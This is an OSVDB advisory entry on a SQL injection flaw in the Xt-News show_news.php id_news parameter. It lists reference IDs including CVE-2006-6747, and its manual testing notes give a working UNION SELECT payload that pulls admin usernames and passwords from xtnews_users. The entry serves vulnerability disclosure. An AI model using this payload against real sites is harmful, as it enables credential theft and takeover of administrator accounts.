Xt-News show_news.php id_news Variable SQL Injection

2006-12-21T04:49:04
ID OSVDB:32440
Type osvdb
Reporter OSVDB
Modified 2006-12-21T04:49:04

Description

Manual Testing Notes

http://[target]/[script_news_path]/show_news.php?id_news=-1 UNION SELECT id,user,null,null,mdp,null,null,null,null,null,null FROM xtnews_users WHERE admin=1#

References:

Secunia Advisory ID:23456 Related OSVDB ID: 32438 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-12/0371.html ISS X-Force ID: 31147 FrSIRT Advisory: ADV-2006-5145 CVE-2006-6747 Bugtraq ID: 21719